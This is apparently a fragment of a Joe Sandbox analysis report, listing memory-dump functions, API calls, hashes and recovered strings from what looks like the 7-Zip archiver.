                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                        • Instruction ID: 8925184d71202570b625feeffac205bc40e225ebce9f8a3162c09dbcfa6d2959
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D111FA2330398485CA11AF35D86176A2360EB87FA9F1892F1DF6D677A9CE24C84AC714
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                        • Instruction ID: 1e8845cc6e0ac6a029075bd0baf4adbbe732d2f922b26c9afbc626f196eea841
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF01A523703D90898B21EF36DC512696361EB96FE971942E5DF3D2B359DE20CC428740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                        • Instruction ID: 3a66e18a3d9977e4c8224590acd29f5403784a36c85a7c718b053e0e89a88d8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45111E23743D4085CA20AF35D85176E2390EB87FA5F1842F1AF6D6B7A9CF20C84AC750
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B96B7C
                                                                                                                                                                                                          • Part of subcall function 00B56618: FormatMessageW.KERNEL32 ref: 00B56676
                                                                                                                                                                                                          • Part of subcall function 00B56618: LocalFree.KERNEL32 ref: 00B56698
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
                                                                                                                                                                                                          • Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        • free.MSVCRT ref: 00B96BAE
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B96BCC
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputsfree$FormatFreeLocalMessagefputc
                                                                                                                                                                                                        • String ID: : $----------------
                                                                                                                                                                                                        • API String ID: 1215563195-4071417161
                                                                                                                                                                                                        • Opcode ID: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
                                                                                                                                                                                                        • Instruction ID: d9ce2f3aa7ee23e62fc34d00c1b131a0c5f2744454f75e54c61f88014ded58be
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC01A16230190595DA20EF26E88072E3320F785BE5F0882A5EF6E433A4DF3CC44AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                        • Instruction ID: 9b4739ba75970c4cc161b6a7a7e681904f8e41c91d2584255e54aadfebbaa97d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3F01923B13C5089CA11AF36DC9166D23A0EB87FE671942F1AF1D6B369CF20C8478784
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BCD4
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
                                                                                                                                                                                                          • Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BD17
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        • free.MSVCRT ref: 00B9BD2B
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputsfree$fputc
                                                                                                                                                                                                        • String ID: : $Write SFX:
                                                                                                                                                                                                        • API String ID: 3584323934-2530961540
                                                                                                                                                                                                        • Opcode ID: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
                                                                                                                                                                                                        • Instruction ID: 526afda49a2e3100fc6bc76ba3662554a73c9cedc718b52ae6d36170f6311b8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A30167A230594191DE20EF25E85435E6361EB85FF5F48D3B1AE2E477A9DF2CC98AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BB49
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BB76
                                                                                                                                                                                                          • Part of subcall function 00B52568: free.MSVCRT ref: 00B525B5
                                                                                                                                                                                                          • Part of subcall function 00B52568: free.MSVCRT ref: 00B525C0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputsfree
                                                                                                                                                                                                        • String ID: Creating archive: $StdOut$Updating archive:
                                                                                                                                                                                                        • API String ID: 2581285248-1319951512
                                                                                                                                                                                                        • Opcode ID: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
                                                                                                                                                                                                        • Instruction ID: 04a71e3a439d09582ad99684f82a4a32532ba5893a3b94b8078fe3374fa874e5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33F062A5305A45D1DE05DF2AEA9436C3361EB45FE5F48D4728E0E4B769EF2CC489C300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                        • Instruction ID: aabac03b6ed7e8f26e752cf4232c36302cea6459e55d61656b15474e8ad69912
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88E0DC13713C0481DB14FF76DC9122D23A4E7D7F4571410D19F2D5B325CD10C8568B84
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                        • Instruction ID: fb3fdae8b899e72dced779120df5f90b41e18ed76754c004acf12d1fe454ba80
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D814873305AC085CB14EF2AD8802AD77A1F786F98F4841A2DE5D1B769CF39C886C311
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Q
                                                                                                                                                                                                        • API String ID: 0-3463352047
                                                                                                                                                                                                        • Opcode ID: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                        • Instruction ID: 84e3b7735efdbfc16644c41a41fcf4e82cf3826790f7be0ed1b655ceb01aebf0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14616462319A8082CB20DF25E4C066EB7A1FBC9B94F549191EFBE57768DF78C845CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID: act:$ cpus:$ gran:$ page:
                                                                                                                                                                                                        • API String ID: 1294909896-454015223
                                                                                                                                                                                                        • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                        • Instruction ID: a1d843f5a4cd82b5f2f28eabc2c3b597e2ea7c12306c1b5f40b1d7b2f84a4213
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C51C86934160151DE28EB15E9513A823F1EB8A7D1F4492B2DF1A07B98DF7CC559C740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B601D7
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B602EA
                                                                                                                                                                                                          • Part of subcall function 00B5FD30: _CxxThrowException.MSVCRT ref: 00B5FE50
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B6031F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • There is no second file name for rename pair:, xrefs: 00B60302
                                                                                                                                                                                                        • Empty file path, xrefs: 00B602CD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrow$free
                                                                                                                                                                                                        • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                                                                                        • API String ID: 3129652135-1725603831
                                                                                                                                                                                                        • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                        • Instruction ID: 19cf8eb63db5cb40a8ebe0aec2e82fd2713ec8add1b543f8f2846dad630c06ef
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4241C262214684C1CA30EB1AE89075B7BA0F3567B4F504392EFB9177D9DB3DC589CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorFileLastSecurity
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 555121230-0
                                                                                                                                                                                                        • Opcode ID: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                        • Instruction ID: 67b1929509fd1daec7b47cf649002ddace969bb7d75ffb9529ffba7235da8897
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50418E33211A90D6C720EF25E8507A973A6F385B98F598172DF6E9B714DF30C886C751
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                        • API String ID: 1294909896-1885708031
                                                                                                                                                                                                        • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                        • Instruction ID: 504b5463a5d15445fd03bebe03476c16dc779dc8cb43e18fb0551075fc5c3d3b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9131A323304A9081CB20EF15D98055EA7E4F7D57E4F6402A1FEAE5B774DE38C886CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00B53E32), ref: 00B53D18
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00B53E32), ref: 00B53D25
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B53D4E
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00B53E32), ref: 00B53DC1
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B53DFA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2296236218-0
                                                                                                                                                                                                        • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                        • Instruction ID: 004b0df0fc04aea5e6cb98343384e0a47e27140eeeb937b7d17e8a5efb9e7ce4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1231FC72704AC18ACB20CF25E48036EBBF5F788B94F548061DF8963B20DB38C886C751
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                        • Instruction ID: d7dc35fa3ae7b201010054a2d403b5984a10e31ca9c16881d952a572c2f4173c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB213B67752E4086CF25DF36D85072963A0EB86FA9F2942A1DF2D27798DF35C806C350
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
